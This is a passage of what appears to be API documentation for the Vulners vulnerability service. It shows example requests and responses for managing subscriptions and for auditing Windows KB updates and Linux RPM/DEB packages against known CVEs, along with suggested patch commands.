subscriptionid="subscription_id",
active="false"
)
{
"result": "OK",
"data": {
"id": "3C5SC5C5IS6DG9HE8BG470LBWBJWU0GTO2OAN93DLUJCSCH3SYWO1S13I8K17DSB",
"active": false,
"confirmed": false,
"query": "",
"query_type": "lucene",
"link_query": "/search?query=",
"crontab": "0 1 * * *",
"deliveryAddress": "[email protected]",
"deliveryFormat": "json"
}
}
Delete subscription¶
Required parameters:
- subscriptionid: The ID of the subscription to be deleted.
- apiKey: Activated API key required for authentication.
Query:
POST /api/v3/subscriptions/removeEmailSubscription/
Query example:
curl -X POST 'https://vulners.com/api/v3/subscriptions/removeEmailSubscription/' -H 'Content-Type: application/json' -d '{
"subscriptionid": "{subscription id}",
"apiKey": "{API key}"
}'
delete_subscription = vulners_api.delete_subscription(
subscriptionid="subscription_id",
)
{
"result": "OK",
"data": {}
}
Windows Audit¶
Audit Windows via KB¶
Use quick audit of Windows hosts for installed security KB. Windows audit requires OS version + list of installed updates (KB).
Required parameters:
- os: os version can be obtained from systeminfo;
- kbList: Installed KBs is also via systeminfo or via wmic qfe list.
- apiKey: Activated API key
Query:
POST /api/v3/audit/kb/
Query example:
curl -XPOST https://vulners.com/api/v3/audit/kb/ -H 'Content-Type: application/json' -d '{
"os": "Windows Server 2012 R2",
"kbList": ["KB5009586", "KB5009624", "KB5008230", "KB5007247", "KB5005693", "KB5007205", "KB5003646"],
"apiKey": "{API key}"
}'
win_vulners = vulners_api.kb_audit(
os="Windows Server 2016", kb_list=["KB5009586", "KB5009624", "KB5008230", "KB5007247", "KB5005693", "KB5007205", "KB5003646"])
need_2_install_kb = win_vulners['kbMissed']
affected_cve = win_vulners['cvelist']
[
"KB5000803",
"KB5017095",
"KB5011495",
"KB5003638",
"KB5009546",
"KB5012596",
"KB5004948",
"KB5001347",
"KB5007192",
"KB5004238",
"KB5010359",
"KB5014702",
"KB5016622",
"KB4601318",
"KB5005573",
"KB5008207",
"KB5006669",
"KB5012170",
"KB5015808",
"KB5005043",
"KB5013952",
"KB5003197"
]
[ "CVE-2021-36942",
"CVE-2021-31958",
"CVE-2022-34302",
"CVE-2022-30166",
"CVE-2022-22002",
"CVE-2021-1640",
"CVE-2021-24111",
"CVE-2022-26832",
"CVE-2021-33757",
"CVE-2021-41361",
"CVE-2021-36938",
"CVE-2020-1036",
"CVE-2021-42279",
"CVE-2022-34303",
"CVE-2021-28318",
"CVE-2020-1472",
"CVE-2022-21897",
"CVE-2021-38667",
"CVE-2021-31959",
"CVE-2021-34481",
"CVE-2022-30154",
"CVE-2021-34459",
"CVE-2022-23293",
"CVE-2020-17049",
"CVE-2020-26784",
"CVE-2022-22048",
"CVE-2021-33779",
"CVE-2021-43893",
"CVE-2022-26784",
"CVE-2021-26419",
"CVE-2021-34527",
"CVE-2022-35822",
"CVE-2022-34301",
"CVE-2022-30138",
"CVE-2021-264110"
]
Audit installed KB's and software¶
Use quick audit of Windows hosts for installed security KB and software. Windows audit requires OS version, a list of installed updates (KB) and a list of installed software, CPE parts such as target_sw
, sw_edition
, and platform
can be used to improve accuracy.
Required parameters:
- os (str): Operating system name (can be obtained from systeminfo).
- version (str): Operating system version (can be obtained from systeminfo).
- kbList (list): List of installed updates (KB), which can be gathered via comands
systeminfo
orwmic qfe list
. -
software (list): List of installed software and version information, with optional CPE parameters for further refinement. Read more
Example:
{ "software": "Mozilla Firefox", "version": "117.0", "sw_edition": "home_premium", "target_sw": "windows", "target_hw": "x64", "update": "sp2", "language": "en" }
-
apiKey: Activated API key
Additional CPE attributes for refining search accuracy:
-
update (str): Specifies the software update version to refine the search for vulnerabilities related to a specific update level. Examples include
service packs
(e.gsp1
) for Windows, patch versions, hotfixes, or other minor updates.Official NIST 7695 for
update
Values for this attribute SHOULD be vendor-specific alphanumeric strings characterizing the particular update, service pack, or point release of the product. Values for this attribute SHOULD be selected from an attribute-specific valid-values list, which MAY be defined by other specifications that utilize this specification.
-
language (str): Defines the language edition of the software, if applicable. Use this to target vulnerabilities in localized versions of the software.
Official NIST 7695 for
language
Values for this attribute SHALL be valid language tags as defined by [RFC5646], and SHOULD be used to define the language supported in the user interface of the product being described. Although any valid language tag MAY be used, only tags containing language and region codes SHOULD be used.
-
sw_edition (str): Indicates the specific edition of the software. (e.g.,
home_premium
for Windows,continuous
for Acrobat Reader, orserver
for Linux)Official NIST 7695 for
sw_edition
Values for this attribute SHOULD characterize how the product is tailored to a particular market or class of end users. Values for this attribute SHOULD be selected from an attribute-specific valid-values list, which MAY be defined by other specifications that utilize this specification. Any character string meeting the requirements for WFNs (cf. 5.3.2) MAY be specified as the value of the attribute.
-
target_sw (str): Specifies the platform where the software runs, such as
windows
,macOS
,linux
, or other environments likejava
,chrome
,azure
, etc. If not specified, the search will include software that runs on*
orwindows
platforms.Official NIST 7695 for
target_sw
Values for this attribute SHOULD characterize the software computing environment within which the product operates. Values for this attribute SHOULD be selected from an attribute-specific valid-values list, which MAY be defined by other specifications that utilize this specification.
-
target_hw (str): Identifies the hardware platform for the software, such as
x86
,x64
,arm
, or specific devices likerouter
ormobile
.Official NIST 7695 for
target_hw
Values for this attribute SHOULD characterize the instruction set architecture (e.g.,
x86
) on which the product being described or identified by the WFN operates. Bytecode-intermediate languages, such as Java bytecode for the Java Virtual Machine or Microsoft Common Intermediate Language for the Common Language Runtime virtual machine, SHALL be considered instruction set architectures.
Optional Parameters:
- platform (str): If provided, this parameter sets the
target_hw
field for all software to the specified platform value. For example, if"platform": "arm64"
, all listed software will includetarget_hw: arm64
.
Possible values for CPE parameters:
*
: Includes all values, both those containing - or * and without."-"
: Filters results to exclude specified values.."software_name"
: Includes results with this value and any values containing*
.
Defaults:
- platform:
arm64
if not explicitly specified. - target_sw:
windows
if not explicitly specified
Query:
POST /api/v3/audit/winaudit/
Query example:
curl -XPOST https://vulners.com/api/v3/audit/winaudit/ -H 'Content-Type: application/json' -d '{
"os": "windows",
"os_version": "10.0.19045",
"kb_list": ["KB5009586", "KB5009624", "KB5008230", "KB5007247", "KB5005693", "KB5007205", "KB5003646"],
"software": [
{"software": "7-Zip", "version": "19.00", "sw_edition": "home_premium", "target_sw": "windows", "target_hw": "x64", "update": "sp1", "language": "en"},
{"software": "Git", "version": "2.33.0.2", "target_sw": "windows", "target_hw": "x64"},
{"software": "Notepad++", "version": "8.4.6", "target_sw": "windows", "target_hw": "x64"},
{"software": "Microsoft OneDrive", "version": "22.227.1030.0001", "sw_edition": "home_premium", "target_sw": "windows", "target_hw": "x64"},
{"software": "VMware Fusion", "version": "13.1", "target_sw": "windows", "target_hw": "x64"}
],
"apiKey": "{API key}"
}'
kb = ["KB5009586", "KB5009624", "KB5008230", "KB5007247", "KB5005693", "KB5007205", "KB5003646"]
software = [{'software': '7-Zip', 'version': '19.00', 'sw_edition': 'home_premium', 'target_sw': 'windows', 'target_hw': 'x64', 'update': 'sp1', 'language': 'en'},
{'software': 'Git', 'version': '2.33.0.2', 'target_sw': 'windows', 'target_hw': 'x64'},
{'software': 'Notepad++', 'version': '8.4.6', 'target_sw': 'windows', 'target_hw': 'x64'},
{'software': 'Microsoft OneDrive', 'version': '22.227.1030.0001', 'sw_edition': 'home_premium', 'target_sw': 'windows', 'target_hw': 'x64'},
{'software': 'VMware Fusion', 'version': '13.1', 'target_sw': 'windows', 'target_hw': 'x64'}
]
os_name = 'windows'
os_version = '10.0.19045'
report = vulners_api.winaudit(os=os_name, os_version=os_version, kb_list=kb, software=software)
- package: The name of the software package.
- published: The date when the bulletin was published.
- bulletinID: The ID of the bulletin associated with the CVEs.
- **cvelist*: List of CVE IDs linked to the package.
- cvss: CVSS score and severity level of the vulnerabilities.
- fix: Suggested update or patch to fix the issue.
[
{
"package": "windows 11 version 22h2",
"published": "2024-09-10",
"bulletinID": "MS:CVE-2024-38254",
"cvelist": ["CVE-2024-38254"],
"cvss": {
"score": 6.2,
"severity": "MEDIUM"
},
"fix": "Install KB5043076 update"
},
{
"package": "windows 11 version 23h2",
"published": "2024-09-10",
"bulletinID": "MS:CVE-2024-38257",
"cvelist": ["CVE-2024-38257"],
"cvss": {
"score": 7.5,
"severity": "HIGH"
},
"fix": "Install KB5043076 update"
},
{
"package": "windows 11 version 23h2",
"published": "2024-07-09",
"bulletinID": "MS:CVE-2024-38517",
"cvelist": ["CVE-2024-38517"],
"cvss": {
"score": 7.8,
"severity": "HIGH"
},
"fix": "Install KB5040442 update"
}
]
Windows KB superseeding/parentseeding data¶
Refer to this if you need more information about KB after the previous method. Superseeded information will be returned as a dictionary with two fields: 'superseeds', 'parentseeds'.
- Superseeds means "what KB are covered by this KB".
- Parentseeds means "what KB are covering this KB".
Query:
POST /api/v3/search/id/
Query example:
curl -XPOST https://vulners.com/api/v3/search/id/ -H 'Content-Type: application/json' -d '{
"id": "KB4524135",
"fields": ["superseeds", "parentseeds"],
"apiKey": "{API key}"
}'
seeds = vulners_api.get_kb_seeds("KB4524135")
{
"superseeds": [
"KB3021952",
"KB4103768",
"KB2699988",
"KB3100773",
"KB931768",
"KB4466536",
"KB4343205",
"KB896688",
"KB4462949",
"KB2977629",
"KB2817183",
"KB972260",
"KB4457426",
"KB980182",
"KB929969",
"KB4470199",
"KB2544521",
"KB4511872",
"KB2744842",
"KB2879017",
"KB2497640",
"KB2360131",
"KB4025252",
"KB2829530",
"KB4047206",
"KB3093983",
"KB4507434",
"KB4056568",
"KB960714",
"KB2530548",
"KB3203621",
"KB833989",
"KB2761451",
"KB3139929",
"KB4339093",
"KB4483187",
"KB969897",
"KB910620",
"KB942615",
"KB956390",
"KB937143",
"KB4052978",
"KB2416400",
"KB4018271",
"KB2987107",
"KB2870699",
"KB982381",
"KB2183461",
"KB2586448",
"KB958215",
"KB963027",
"KB2862772",
"KB4012204",
"KB4036586",
"KB3175443",
"KB933566",
"KB947864",
"KB2647516",
"KB4486474",
"KB944533",
"KB2976627",
"KB4074736",
"KB2792100",
"KB905915",
"KB922760",
"KB4489873",
"KB883939",
"KB2797052",
"KB2909212",
"KB4230450",
"KB3003057",
"KB4092946",
"KB2963952",
"KB978207",
"KB4034733",
"KB939653",
"KB976325",
"KB3154070",
"KB4040685",
"KB3038314",
"KB928090",
"KB2675157",
"KB4493435",
"KB3197655",
"KB896727",
"KB3034196",
"KB3049563",
"KB3032359",
"KB2618444",
"KB974455",
"KB938127",
"KB2838727",
"KB3148198",
"KB3191492",
"KB3170106",
"KB2559049",
"KB2809289",
"KB3058515",
"KB4014661",
"KB4516046",
"KB950759",
"KB925486",
"KB3036197",
"KB3124275",
"KB2799329",
"KB3008923",
"KB3078071",
"KB953838",
"KB3065822",
"KB2722913",
"KB4021558",
"KB3104002",
"KB912812",
"KB918899",
"KB2482017",
"KB3160005",
"KB2962872",
"KB4096040",
"KB916281",
"KB3185319",
"KB3087038",
"KB4480965",
"KB2761465",
"KB4089187",
"KB2846071",
"KB890923",
"KB4503259",
"KB4498206",
"KB3134814"
],
"parentseeds": [
"KB4571687",
"KB4534251",
"KB4540671",
"KB4586768",
"KB4519974",
"KB4525106",
"KB4530677",
"KB4556798",
"KB4565479",
"KB4561603",
"KB4537767",
"KB4550905",
"KB4577010"
]
}
Get the list of Windows KB updates with download urls¶
Query:
POST /api/v3/search/lucene/
Query example:
curl -XPOST https://vulners.com/api/v3/search/lucene/ -H 'Content-Type: application/json' -d '{
"query": "type:msupdate AND kb:(KB4524135)",
"skip": 0,
"size": 100,
"fields": [
"id",
"title",
"description",
"type",
"bulletinFamily",
"cvss",
"published",
"modified",
"lastseen",
"href",
"sourceHref",
"sourceData",
"cvelist"],
"apiKey": "{API key}"
}'
microsoft_updates_for_kb = vulners_api.get_kb_updates("KB4524135")
updates_download_links = [update.get('href') for update in microsoft_updates_for_kb]
[
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=ef31383a-7932-441a-a626-f0a145cc422a",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=18552c40-7e36-4f15-960a-9717a4912af1",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=375f016c-b4ac-4d71-9dee-8095427a3c86",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=2ca3d95f-1ecb-4850-aeb4-afb63cd6374a",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=72890150-da44-47b2-b1b5-7dce2d5d1a30",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=fba96f27-5955-45e1-82e5-ad350b4627e0",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=9668152f-78a1-44f9-a229-38e86189703a",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=e08d28ef-d685-412c-b0bc-8cc26bf899c3",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=a22dcbac-485a-4834-8556-fee2e437ab9b",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=db62995c-3814-4fd7-a481-dc285f0640e2",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=16216817-6043-4587-a803-9b3a9f3a58cc",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=393d67e1-8827-4c6d-9187-b6320a9a03bc",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=b18abca1-c8ec-4e43-9fa0-cc2b2a518304",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=96c42c78-234b-4ae7-b097-be0eb8ac6f25",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=63cc9ae6-6d02-4936-8b77-b976b440ff25",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=2661795f-8beb-468f-9c4f-0de83724a90f"
]
Linux Audit¶
Auditing Linux requires getting the versions of the packages installed on a system.
Supported systems¶
To get all actually supported systems:
Query:
GET /api/v3/audit/audit/
Query example:
curl -XPOST https://vulners.com/api/v3/audit/audit/ -H 'Content-Type: application/json' -d '{
"os": "centos",
"version": "7",
"package": ["glibc-common-2.17-157.el7_3.5.x86_64"],
"apiKey": "{API key}"
}'
Audit Linux hosts for vulnerabilities (RPM/DEB)¶
Example for CentOS 7. You can use it for any RPM based OS. Execute command: rpm -qa --qf '%{NAME}-%{VERSION}-%{RELEASE}.%{ARCH}\\n'
.
Use it as package variable input:
Query:
POST /api/v3/audit/audit/
Query example:
curl -XPOST https://vulners.com/api/v3/audit/audit/ -H 'Content-Type: application/json' -d '{
"os": "centos",
"version": "7",
"package": ["glibc-common-2.17-157.el7_3.5.x86_64"],
"apiKey": "{API key}"
}'
centos_vulnerabilities = vulners_api.os_audit(
os= 'centos', os_version= '7', package= ['glibc-common-2.17-157.el7_3.5.x86_64'])
vulnerable_packages = centos_vulnerabilities.get('packages')
missed_patches_ids = centos_vulnerabilities.get('vulnerabilities')
cve_list = centos_vulnerabilities.get('cvelist')
how_to_fix = centos_vulnerabilities.get('cumulativeFix')
{
"glibc-common-2.17-157.el7_3.5.x86_64": {
"CESA-2017:1916": [
{
"package": "glibc-common-2.17-157.el7_3.5.x86_64",
"providedOSName": "centos",
"matchedOSName": "centos",
"bulletinOSName": "CentOS",
"providedOSVersion": "7",
"bulletinOSVersion": "7",
"providedVersion": "0:2.17-157.el7_3.5",
"bulletinVersion": "2.17-196.el7",
"providedPackage": "glibc-common-2.17-157.el7_3.5.x86_64",
"bulletinPackage": "glibc-common-2.17-196.el7.x86_64.rpm",
"operator": "lt",
"bulletinID": "CESA-2017:1916",
"cvelist": [
"CVE-2015-8776",
"CVE-2015-8777",
"CVE-2015-8779",
"CVE-2015-8778",
"CVE-2014-9761"
],
"cvss": {
"score": 7.5,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"
},
"fix": "sudo yum -y update glibc-common"
}
],
"CESA-2018:3092": [
{
"package": "glibc-common-2.17-157.el7_3.5.x86_64",
"providedOSName": "centos",
"matchedOSName": "centos",
"bulletinOSName": "CentOS",
"providedOSVersion": "7",
"bulletinOSVersion": "7",
"providedVersion": "0:2.17-157.el7_3.5",
"bulletinVersion": "2.17-260.el7",
"providedPackage": "glibc-common-2.17-157.el7_3.5.x86_64",
"bulletinPackage": "glibc-common-2.17-260.el7.x86_64.rpm",
"operator": "lt",
"bulletinID": "CESA-2018:3092",
"cvelist": [
"CVE-2018-11237",
"CVE-2018-6485",
"CVE-2018-11236",
"CVE-2017-16997"
],
"cvss": {
"score": 9.3,
"vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"
},
"fix": "sudo yum -y update glibc-common"
}
],
"CESA-2018:0805": [
{
"package": "glibc-common-2.17-157.el7_3.5.x86_64",
"providedOSName": "centos",
"matchedOSName": "centos",
"bulletinOSName": "CentOS",
"providedOSVersion": "7",
"bulletinOSVersion": "7",
"providedVersion": "0:2.17-157.el7_3.5",
"bulletinVersion": "2.17-222.el7",
"providedPackage": "glibc-common-2.17-157.el7_3.5.x86_64",
"bulletinPackage": "glibc-common-2.17-222.el7.x86_64.rpm",
"operator": "lt",
"bulletinID": "CESA-2018:0805",
"cvelist": [
"CVE-2014-9402",
"CVE-2017-15670",
"CVE-2015-5180",
"CVE-2017-15804",
"CVE-2017-12132",
"CVE-2018-1000001"
],
"cvss": {
"score": 7.8,
"vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"
},
"fix": "sudo yum -y update glibc-common"
}
],
"CESA-2019:2118": [
{
"package": "glibc-common-2.17-157.el7_3.5.x86_64",
"providedOSName": "centos",
"matchedOSName": "centos",
"bulletinOSName": "CentOS",
"providedOSVersion": "7",
"bulletinOSVersion": "7",
"providedVersion": "0:2.17-157.el7_3.5",
"bulletinVersion": "2.17-292.el7",
"providedPackage": "glibc-common-2.17-157.el7_3.5.x86_64",
"bulletinPackage": "glibc-common-2.17-292.el7.x86_64.rpm",
"operator": "lt",
"bulletinID": "CESA-2019:2118",
"cvelist": [
"CVE-2016-10739"
],
"cvss": {
"score": 4.6,
"vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"
},
"fix": "sudo yum -y update glibc-common"
},
{
"package": "glibc-common-2.17-157.el7_3.5.x86_64",
"providedOSName": "centos",
"matchedOSName": "centos",
"bulletinOSName": "CentOS",
"providedOSVersion": "7",
"bulletinOSVersion": "7",
"providedVersion": "0:2.17-157.el7_3.5",
"bulletinVersion": "2.17-292.el7",
"providedPackage": "glibc-common-2.17-157.el7_3.5.x86_64",
"bulletinPackage": "glibc-common-2.17-292.el7.x86_64.rpm",
"operator": "lt",
"bulletinID": "CESA-2019:2118",
"cvelist": [
"CVE-2016-10739"
],
"cvss": {
"score": 4.6,
"vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"
},
"fix": "sudo yum -y update glibc-common"
}
],
"CESA-2020:3861": [
{
"package": "glibc-common-2.17-157.el7_3.5.x86_64",
"providedOSName": "centos",
"matchedOSName": "centos",
"bulletinOSName": "CentOS",
"providedOSVersion": "7",
"bulletinOSVersion": "7",
"providedVersion": "0:2.17-157.el7_3.5",
"bulletinVersion": "2.17-317.el7",
"providedPackage": "glibc-common-2.17-157.el7_3.5.x86_64",
"bulletinPackage": "glibc-common-2.17-317.el7.x86_64.rpm",
"operator": "lt",
"bulletinID": "CESA-2020:3861",
"cvelist": [
"CVE-2019-19126"
],
"cvss": {
"score": 2.1,
"vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"
},
"fix": "sudo yum -y update glibc-common"
}
],
"CESA-2021:0348": [
{
"package": "glibc-common-2.17-157.el7_3.5.x86_64",
"providedOSName": "centos",
"matchedOSName": "centos",
"bulletinOSName": "CentOS",
"providedOSVersion": "7",
"bulletinOSVersion": "7",
"providedVersion": "0:2.17-157.el7_3.5",
"bulletinVersion": "2.17-322.el7_9",
"providedPackage": "glibc-common-2.17-157.el7_3.5.x86_64",
"bulletinPackage": "glibc-common-2.17-322.el7_9.x86_64.rpm",
"operator": "lt",
"bulletinID": "CESA-2021:0348",
"cvelist": [
"CVE-2020-10029",
"CVE-2020-29573",
"CVE-2019-25013"
],
"cvss": {
"score": 7.1,
"vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"
},
"fix": "sudo yum -y update glibc-common"
}
]
}
}
[
"CESA-2018:0805",
"CESA-2021:0348",
"CESA-2020:3861",
"CESA-2017:1916",
"CESA-2018:3092",
"CESA-2019:2118"
]
[
"CVE-2016-10739",
"CVE-2015-8776",
"CVE-2014-9402",
"CVE-2020-10029",
"CVE-2017-15670",
"CVE-2020-29573",
"CVE-2018-11237",
"CVE-2015-8777",
"CVE-2018-6485",
"CVE-2015-5180",
"CVE-2015-8779",
"CVE-2017-15804",
"CVE-2015-8778",
"CVE-2018-11236",
"CVE-2017-16997",
"CVE-2017-12132",
"CVE-2019-25013",
"CVE-2014-9761",
"CVE-2019-19126",
"CVE-2018-1000001"
]
"sudo yum -y update glibc-common"
Example for Debian 8. You can use it for any DEB based OS. Execute command: dpkg-query -W -f='${Package} ${Version} ${Architecture}\\n'
.
Use it as package variable input:
Query:
POST /api/v3/audit/audit/
Query example:
curl -XPOST https://vulners.com/api/v3/audit/audit/ -H 'Content-Type: application/json' -d '{
"os": "debian",
"version": "8",
"package": ["uno-libs3 4.3.3-2+deb8u7 amd64"],
"apiKey": "{API key}"
}'
debian_vulnerabilities = vulners_api.os_audit(
os= 'debian', os_version= '8', package= ['uno-libs3 4.3.3-2+deb8u7 amd64'])
{
"packages": {
"uno-libs3 4.3.3-2+deb8u7 amd64": {
"DEBIAN:DSA-3608-1:00C2E": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u5",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u5_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-3608-1:00C2E",
"cvelist": [
"CVE-2016-4324"
],
"cvss": {
"score": 6.8,
"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:DSA-4111-2:43AFA": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u10",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u10_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-4111-2:43AFA",
"cvelist": [
"CVE-2018-6871"
],
"cvss": {
"score": 5.0,
"vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:DSA-3394-1:77FE6": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u2",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u2_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-3394-1:77FE6",
"cvelist": [
"CVE-2015-5214",
"CVE-2015-5212",
"CVE-2015-4551",
"CVE-2015-5213"
],
"cvss": {
"score": 6.8,
"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:DSA-3837-1:BCC65": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u7",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u7_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-3837-1:BCC65",
"cvelist": [
"CVE-2017-7870"
],
"cvss": {
"score": 7.5,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:DSA-3236-1:341CA": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u1",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u1_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-3236-1:341CA",
"cvelist": [
"CVE-2015-1774"
],
"cvss": {
"score": 6.8,
"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:BSA-096:958E6": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.2.5-1",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.2.5-1_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:BSA-096:958E6",
"cvelist": [
"CVE-2014-0247"
],
"cvss": {
"score": 10.0,
"vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:DSA-4178-1:A9FA0": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u11",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u11_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-4178-1:A9FA0",
"cvelist": [
"CVE-2018-10120",
"CVE-2018-10119"
],
"cvss": {
"score": 6.8,
"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:DSA-3792-1:CB086": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u6",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u6_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-3792-1:CB086",
"cvelist": [
"CVE-2017-3157"
],
"cvss": {
"score": 4.3,
"vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:DSA-4022-1:5372C": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u9",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u9_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-4022-1:5372C",
"cvelist": [
"CVE-2017-12607",
"CVE-2017-12608"
],
"cvss": {
"score": 6.8,
"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:DSA-3482-1:91A41": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u3",
"providedPackage": "uno-libs3 4.3.3-2+deb8u7 amd64",
"bulletinPackage": "uno-libs3_1:4.3.3-2+deb8u3_all.deb",
"operator": "lt",
"bulletinID": "DEBIAN:DSA-3482-1:91A41",
"cvelist": [
"CVE-2016-0794",
"CVE-2016-0795"
],
"cvss": {
"score": 9.3,
"vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"
},
"fix": "sudo apt-get --assume-yes install --only-upgrade uno-libs3"
}
],
"DEBIAN:DLA-1669-1:E907A": [
{
"package": "uno-libs3 4.3.3-2+deb8u7 amd64",
"providedOSName": "debian",
"matchedOSName": "debian",
"bulletinOSName": "Debian",
"providedOSVersion": "8",
"bulletinOSVersion": "8",
"providedVersion": "4.3.3-2+deb8u7",
"bulletinVersion": "1:4.3.3-2+deb8u12",
